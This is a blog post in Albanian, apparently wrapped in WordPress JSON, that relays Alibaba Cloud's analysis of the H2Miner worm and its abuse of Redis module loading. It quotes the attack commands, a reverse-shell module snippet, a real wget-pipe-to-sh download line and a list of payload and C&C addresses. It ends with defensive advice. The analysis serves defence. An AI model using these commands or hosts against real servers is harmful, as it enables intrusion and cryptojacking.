{"id":55714,"date":"2020-01-27T00:00:00","date_gmt":"2020-01-26T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce"},"modified":"2020-02-18T14:03:51","modified_gmt":"2020-02-18T11:03:51","slug":"obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","status":"publish","type":"post","link":"https:\/\/prohoster.info\/sq\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","title":{"rendered":"A new outbreak of H2Miner worms exploiting Redis RCE has been discovered.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<blockquote><p>Para nj\u00eb dit\u00eb, nj\u00eb nga server\u00ebt e projektit tim u sulmua nga nj\u00eb virus i till\u00eb. N\u00eb k\u00ebrkim t\u00eb p\u00ebrgjigjes p\u00ebr pyetjen \"\u00e7far\u00eb ishte kjo?\" gjeta nj\u00eb artikull t\u00eb shk\u00eblqyer nga ekipi i Siguris\u00eb s\u00eb Alibaba Cloud. Duke qen\u00eb se nuk e gjeta k\u00ebt\u00eb artikull n\u00eb Habr, vendosa ta p\u00ebrkthej at\u00eb n\u00eb m\u00ebnyr\u00eb t\u00eb ve\u00e7ant\u00eb p\u00ebr ju &lt;3\n<\/p><\/blockquote>\n<h2>Hyrje<\/h2>\n<p>\nS\u00eb fundmi, ekipi i siguris\u00eb s\u00eb Alibaba Cloud zbuloi nj\u00eb shp\u00ebrthim t\u00eb papritur t\u00eb H2Miner. Ky lloj virusi keqdash\u00ebs p\u00ebrdor munges\u00ebn e autorizimit ose fjal\u00ebkalimet e dob\u00ebta p\u00ebr Redis si porta p\u00ebr sistemet tuaja, e m\u00eb pas sinkronizon modulin e tij t\u00eb keq me slave p\u00ebrmes sinkronizimit master-slave dhe, p\u00ebrfundimisht, ngarkon k\u00ebt\u00eb modul t\u00eb keq n\u00eb makin\u00ebn e sulmuar dhe ekzekuton instrukcionet e keqja.<\/p>\n<p>N\u00eb t\u00eb kaluar\u00ebn, sulmet ndaj sistemeve tuaja kryesisht ishin realizuar p\u00ebrmes nj\u00eb metode q\u00eb p\u00ebrfshinte detyra t\u00eb planifikuara ose \u00e7el\u00ebsa SSH, t\u00eb cilat shkruheshin n\u00eb makin\u00ebn tuaj pas hyrjes s\u00eb sulmuesit n\u00eb Redis. Fatmir\u00ebsisht, kjo metod\u00eb nuk p\u00ebrdoret shpesh p\u00ebr shkak t\u00eb problemeve me kontrollet e autorizimit ose p\u00ebr shkak t\u00eb versioneve t\u00eb ndryshme t\u00eb sistemit. Megjithat\u00eb, kjo metod\u00eb e ngarkimit t\u00eb modulit t\u00eb keq mund t\u00eb ekzekutoj\u00eb drejtp\u00ebrdrejt komandat e sulmuesit ose t\u00eb fitoj\u00eb akses n\u00eb shell, q\u00eb \u00ebsht\u00eb e rrezikshme p\u00ebr sistemin tuaj.<\/p>\n<p>P\u00ebr shkak t\u00eb numrit t\u00eb madh <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/sq\/server\/\"   title=\"server\u00ebsh\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"1464\">server\u00ebsh<\/a> t\u00eb Redis\u00ebve t\u00eb vendosur n\u00eb internet (gati 1 milion), ekipi i siguris\u00eb s\u00eb Alibaba Cloud, si nj\u00eb kujtes\u00eb miq\u00ebsore, rekomandon p\u00ebrdoruesve q\u00eb t\u00eb mos ofrojn\u00eb akses n\u00eb Redis nga rrjeti dhe t\u00eb kontrollojn\u00eb rregullisht besueshm\u00ebrin\u00eb e fjal\u00ebkalimeve t\u00eb tyre, si dhe, t\u00eb mos jen\u00eb t\u00eb ekspozuar ndaj sulmeve t\u00eb shpejta.<\/p>\n<h2>H2Miner<\/h2>\n<p>\nH2Miner \u00ebsht\u00eb nj\u00eb botnet minimi p\u00ebr sistemet Linux, i cili mund t\u00eb dep\u00ebrtoj\u00eb n\u00eb sistemin tuaj n\u00eb m\u00ebnyra t\u00eb ndryshme, duke p\u00ebrfshir\u00eb munges\u00ebn e autorizimit n\u00eb Hadoop yarn, Docker dhe vulnerabilitetin e ekzekutimit t\u00eb komandave t\u00eb shkaktuara nga Redis (RCE). Botneti funksionon duke ngarkuar skriptet dhe programet e keqja p\u00ebr t\u00eb minuar t\u00eb dh\u00ebnat tuaja, zgjerimin horizontal t\u00eb sulmit dhe mbajtjen e lidhjeve t\u00eb komand\u00ebs dhe kontrollit (C&amp;C).<br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<h2>Redis RCE<\/h2>\n<p>\nP\u00ebr k\u00ebt\u00eb \u00e7\u00ebshtje ka ndar\u00eb njohurit\u00eb e tij Pavel Toporkov n\u00eb ZeroNights 2018. Pas versionit 4.0, Redis mb\u00ebshtet funksionin e ngarkimit t\u00eb moduleve t\u00eb jashtme, i cili u jep p\u00ebrdoruesve mund\u00ebsin\u00eb t\u00eb ngarkojn\u00eb skedar\u00eb .so, t\u00eb kompiluar me C n\u00eb Redis p\u00ebr t\u00eb realizuar komanda t\u00eb caktuara t\u00eb Redis. Ky funksion, megjith\u00ebse i dobish\u00ebm, ka nj\u00eb vulnerabilitet, ku n\u00eb modin master-slave skedar\u00ebt mund t\u00eb sinkronizohen me slave p\u00ebrmes modit fullresync. Kjo mund t\u00eb p\u00ebrdoret nga sulmuesi p\u00ebr t\u00eb transferuar skedar\u00eb t\u00eb d\u00ebmsh\u00ebm .so. Pas p\u00ebrfundimit t\u00eb transferimit, ata ngarkojn\u00eb modul mbi instanc\u00ebn e prekur t\u00eb Redis dhe ekzekutojn\u00eb \u00e7do komand\u00eb.<\/p>\n<h2>Analiza e virusit t\u00eb d\u00ebmsh\u00ebm<\/h2>\n<p>\nKoh\u00ebt e fundit, ekipi i siguris\u00eb n\u00eb Alibaba Cloud zbuloi se numri i grupit t\u00eb minator\u00ebve t\u00eb d\u00ebmsh\u00ebm H2Miner papritur kishte rritur ndjesh\u00ebm. Sipas analiz\u00ebs, procesi i p\u00ebrgjithsh\u00ebm i lindjes s\u00eb sulmit duket si n\u00eb vijim:<\/p>\n<p><img decoding=\"async\" alt=\"A new outbreak of H2Miner worms exploiting Redis RCE has been discovered.\" src=\"\/wp-content\/uploads\/2020\/01\/e4e47a0ddb0bd9f8d97dd992f3349016.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nH2Miner p\u00ebrdor RCE Redis p\u00ebr nj\u00eb sulm t\u00eb plot\u00eb. Fillimisht, sulmuesit sulmojn\u00eb server\u00ebt e papenguar t\u00eb Redis ose server\u00ebt me fjal\u00ebkalime t\u00eb dob\u00ebta.<\/p>\n<p>Pastaj ata p\u00ebrdorin komand\u00ebn <code>config set dbfilename red2.so<\/code> p\u00ebr t\u00eb ndryshuar emrin e skedarit. Pas k\u00ebsaj, sulmuesit ekzekutojn\u00eb komand\u00ebn <code>slaveof<\/code> p\u00ebr t\u00eb vendosur adres\u00ebn e hostit t\u00eb replikimit master-slave. <\/p>\n<p>Kur instanca e prekur e Redis vendos lidhjen master-slave me Redis-in e d\u00ebmsh\u00ebm, q\u00eb i p\u00ebrket sulmuesit, sulmuesi d\u00ebrgon modulin e infektuar me komand\u00ebn fullresync p\u00ebr t\u00eb sinkronizuar skedar\u00ebt. Pas k\u00ebsaj, skedari red2.so do t\u00eb ngarkohet n\u00eb makin\u00ebn e prekur. Pastaj, sulmuesit p\u00ebrdorin modulimin .\/red2.so p\u00ebr t\u00eb ngarkuar k\u00ebt\u00eb skedar .so. Moduli mund t\u00eb ekzekutoj\u00eb komandat e sulmuesit ose t\u00eb nxis\u00eb nj\u00eb lidhje t\u00eb kthyer (backdoor) p\u00ebr t\u00eb fituar akses n\u00eb makin\u00ebn e prekur.<\/p>\n<pre><code class=\"plaintext\">if (RedisModule_CreateCommand(ctx, &quot;system.exec&quot;,\n        DoCommand, &quot;readonly&quot;, 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n      if (RedisModule_CreateCommand(ctx, &quot;system.rev&quot;,\n        RevShellCommand, &quot;readonly&quot;, 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n<\/code><\/pre>\n<p>\nPas ekzekutimit t\u00eb nj\u00eb komande t\u00eb d\u00ebmshme, t\u00eb till\u00eb si <code>\/ bin \/ sh -c wget -q -O-http:\/\/195.3.146.118\/unk.sh | sh&gt; \/ dev \/ null 2&gt; &amp; 1<\/code>, sulmuesi do t\u00eb fshij\u00eb emrin e skedarit t\u00eb kopjimit dhe do t\u00eb b\u00ebj\u00eb shkarkimin e modulit sistemor p\u00ebr t\u00eb pastruar gjurm\u00ebt. Megjithat\u00eb, skedari red2.so do t\u00eb mbetet ende n\u00eb makin\u00ebn e prekur. P\u00ebrdoruesve u rekomandohet t\u00eb ken\u00eb parasysh pranin\u00eb e nj\u00eb skedari t\u00eb dyshimt\u00eb n\u00eb dosjen e instanc\u00ebs s\u00eb tyre t\u00eb Redis.<\/p>\n<p>P\u00ebrve\u00e7 shkat\u00ebrrimit t\u00eb disa proceseve malware p\u00ebr vjedhjen e burimeve, sulmuesi ndoqi nj\u00eb skenar t\u00eb d\u00ebmsh\u00ebm, duke ngarkuar dhe ekzekutuar skedar\u00eb t\u00eb d\u00ebmsh\u00ebm n\u00eb form\u00eb binare, p\u00ebr t\u00eb <noindex><a rel=\"nofollow\" href=\"http:\/\/142.44.191.122\/kinsing\">142.44.191.122\/kinsing<\/a><\/noindex>. Kjo do t\u00eb thot\u00eb se emri i procesit ose emri i dosjes q\u00eb p\u00ebrmban kinsing n\u00eb hostin \u00ebsht\u00eb tregues se ky sistem \u00ebsht\u00eb prekur nga ky virus.<\/p>\n<p>Sipas rezultateve t\u00eb inxhinieris\u00eb reversi, programi malinj kryesisht kryen funksionet e m\u00ebposhtme:<\/p>\n<ul>\n<li>Ngarkimi i skedar\u00ebve dhe ekzekutimi i tyre<\/li>\n<li>Minimi<\/li>\n<li>Mbajtja e lidhjes C&amp;C dhe ekzekutimi i komandave t\u00eb sulmuesit<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"A new outbreak of H2Miner worms exploiting Redis RCE has been discovered.\" src=\"\/wp-content\/uploads\/2020\/01\/43229670fd28e4b7f1974aa3c36dc3ca.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nP\u00ebrdorni masscan p\u00ebr skanimin e jasht\u00ebm, p\u00ebr t\u00eb zgjeruar ndikimin. P\u00ebr m\u00eb tep\u00ebr, adresa IP e serverit C&amp;C \u00ebsht\u00eb e koduar fort n\u00eb program, dhe hosti i prekur do t\u00eb krijoj\u00eb nd\u00ebrveprime me serverin e komunikacionit C&amp;C p\u00ebrmes k\u00ebrkesave HTTP, ku informacioni i zombi (serveri i komprometuar) identifikohet n\u00eb kok\u00ebn e HTTP.<\/p>\n<p><img decoding=\"async\" alt=\"A new outbreak of H2Miner worms exploiting Redis RCE has been discovered.\" src=\"\/wp-content\/uploads\/2020\/01\/111ba916fa76f45fe458622f260b1d8e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<pre><code class=\"plaintext\">GET \/h HTTP\/1.1\nHost: 91.215.169.111\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/78.0.3904.108 Safari\/537.36\nArch: amd64\nCores: 2\nMem: 3944\nOs: linux\nOsname: debian\nOsversion: 10.0\nRoot: false\nS: k\nUuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\nVersion: 26\nAccept-Encoding: gzip\n<\/code><\/pre>\n<p><\/p>\n<h2>Metodat e tjera t\u00eb sulmit<\/h2>\n<p>\n<img decoding=\"async\" alt=\"A new outbreak of H2Miner worms exploiting Redis RCE has been discovered.\" src=\"\/wp-content\/uploads\/2020\/01\/51c088251ac8fd71d229bfe96e239c29.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h2>Adresat dhe lidhjet q\u00eb p\u00ebrdor krimbi<\/h2>\n<p>\n\/kinsing<\/p>\n<pre><code class=\"plaintext\">\u2022 142.44.191.122\/t.sh\n\u2022 185.92.74.42\/h.sh\n\u2022 142.44.191.122\/spr.sh\n\u2022 142.44.191.122\/spre.sh\n\u2022 195.3.146.118\/unk.sh\n<\/code><\/pre>\n<p>\ns&amp;c<\/p>\n<pre><code class=\"plaintext\">\u2022 45.10.88.102\n\u2022 91.215.169.111\n\u2022 139.99.50.255\n\u2022 46.243.253.167\n\u2022 195.123.220.193\n<\/code><\/pre>\n<p><\/p>\n<h2>K\u00ebshill\u00eb<\/h2>\n<p>\nS\u00eb pari, Redis nuk duhet t\u00eb jet\u00eb i hapur p\u00ebr qasje nga Interneti dhe duhet t\u00eb mbrohet me nj\u00eb fjal\u00ebkalim t\u00eb fort\u00eb. Gjithashtu, \u00ebsht\u00eb e r\u00ebnd\u00ebsishme q\u00eb klient\u00ebt t\u00eb kontrollojn\u00eb mospranin\u00eb e skedarit red2.so n\u00eb drejtorin\u00eb Redis dhe munges\u00ebn e 'kinsing' n\u00eb emrin e skedarit \/ procesit n\u00eb host.<br \/>\n<br \/>Burimi: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/post\/485300\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u044f \u043d\u0435 \u043d\u0430\u0448\u0435\u043b \u044d\u0442\u043e\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u043d\u0430 \u0445\u0430\u0431\u0440\u0435, \u0442\u043e \u0440\u0435\u0448\u0438\u043b \u043f\u0435\u0440\u0435\u0432\u0435\u0441\u0442\u0438 \u0435\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0432\u0430\u0441 &lt;3 \u0412\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435 \u041d\u0435\u0434\u0430\u0432\u043d\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Alibaba Cloud \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u0443\u044e \u0432\u0441\u043f\u044b\u0448\u043a\u0443 H2Miner. [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-55714","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/sq\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"sq_AL\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/sq\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2020-01-26T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T11:03:51+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47 Zbulohet nj\u00eb shp\u00ebrthim i ri i krimbave H2Miner, t\u00eb cil\u00ebt shfryt\u00ebzojn\u00eb Redis RCE | ProHoster","description":"Nj\u00eb dit\u00eb m\u00eb par\u00eb, nj\u00eb nga server\u00ebt e projektit tim u sulmua nga nj\u00eb krimb t\u00eb till\u00eb. N\u00eb k\u00ebrkim t\u00eb nj\u00eb p\u00ebrgjigjeje p\u00ebr pyetjen '\u00e7far\u00eb ishte kjo?', gjeta nj\u00eb artikull t\u00eb shk\u00eblqyer nga ekipi i Siguris\u00eb s\u00eb Alibaba Cloud.","canonical_url":"https:\/\/prohoster.info\/sq\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"sq_AL","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster","og:description":"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.","og:url":"https:\/\/prohoster.info\/sq\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2020-01-26T21:00:00+00:00","article:modified_time":"2020-02-18T11:03:51+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"55714","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 19:38:31","updated":"2026-02-09 16:50:17","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/55714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/comments?post=55714"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/55714\/revisions"}],"predecessor-version":[{"id":158708,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/55714\/revisions\/158708"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/media?parent=55714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/categories?post=55714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/tags?post=55714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}